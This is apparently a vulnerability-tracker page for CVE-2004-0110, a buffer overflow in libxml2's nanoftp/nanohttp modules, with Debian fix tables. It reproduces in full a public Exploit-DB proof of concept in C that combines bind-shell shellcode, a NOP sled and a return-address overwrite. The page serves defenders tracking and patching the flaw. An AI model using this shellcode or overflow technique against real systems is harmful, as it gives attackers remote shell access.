CVE-2004-0110

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execute arbitrary code via a long URL.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

Mitigation details

Source: Debian Security Tracker · View original ↗ · DFSG

CVE-2004-0110 NameCVE-2004-0110 DescriptionBuffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execute arbitrary code via a long URL. SourceCVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more) ReferencesDSA-455…

CVE-2004-0110

Name	CVE-2004-0110
Description	Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execute arbitrary code via a long URL.
Source	CVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
References	DSA-455

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package	Release	Version	Status
libxml2 (PTS)	bullseye	2.9.10+dfsg-6.7+deb11u4	fixed
	bullseye (security)	2.9.10+dfsg-6.7+deb11u9	fixed
	bookworm	2.9.14+dfsg-1.3~deb12u5	fixed
	bookworm (security)	2.9.14+dfsg-1.3~deb12u4	fixed
	trixie	2.12.7+dfsg+really2.9.14-2.1+deb13u2	fixed
	trixie (security)	2.12.7+dfsg+really2.9.14-2.1+deb13u1	fixed
	forky	2.15.2+dfsg-0.1	fixed
	sid	2.15.3+dfsg-1	fixed

The information below is based on the following data on fixed versions.

Package	Type	Release	Fixed Version	Origin
libxml	source	woody	1.8.17-2woody1	DSA-455
libxml	source	(unstable)	1:1.8.17-5
libxml2	source	woody	2.4.19-4woody1	DSA-455
libxml2	source	(unstable)	2.6.6-1

Home - Debian Security - Source (Git)

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-601 local linux verified text · 2 KB

infamous41md · 2004-10-26

libxml 2.6.12 nanoftp - Local Buffer Overflow

text exploit Source: Exploit-DB

/*
 *  libxml 2.6.12 nanoftp bof POC   infamous42mdAThotpopDOTcom
 *
 *  [n00b localho outernet] gcc -Wall libsuxml.c -lxml2
 *  [n00b localho outernet] ./a.out 
 *  Usage: ./a.out <retaddr> [ align ]
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  [n00b localho outernet] ./a.out 0xbfff0360
 *  xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN   
  
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <libxml/nanoftp.h>

#define die(x) do{ perror((x)); exit(1); }while(0)
#define BS 0x10000
#define NOP 0x90
#define NNOPS 3000
#define ALIGN 0

/* call them */
#define SHELL_LEN (sizeof(sc)-1)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
    
 
/*
 */
int main(int argc, char **argv)
{
    int x = 0, len = 0;
    char    buf[BS] = {'A',};
    long    retaddr = 0, align = ALIGN;

    if(argc < 2){
        fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(sscanf(argv[1], "%lx", &retaddr) != 1)
        die("sscanf");
    if(argc > 2)
        align = atoi(argv[2]);
    if(align < 0 || align > 3)
        die("nice try newblar");

    strncpy(buf, "://[", 4);
    len += 4;
    memset(buf+len, NOP, NNOPS);
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);
    len += SHELL_LEN;
    
    len += align;
    for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))
        memcpy(buf+len+x, &retaddr, sizeof(retaddr));
    buf[len+x] = ']';
    buf[len+x+1] = 0;

    xmlNanoFTPNewCtxt(buf);

    return EXIT_SUCCESS;
}

// milw0rm.com [2004-10-26]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.6.6-1`
sid	Fixed	`2.6.6-1`
forky	Fixed	`2.6.6-1`
bullseye	Fixed	`2.6.6-1`
bookworm	Fixed	`2.6.6-1`

References

https://security-tracker.debian.org/tracker/CVE-2004-0110

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.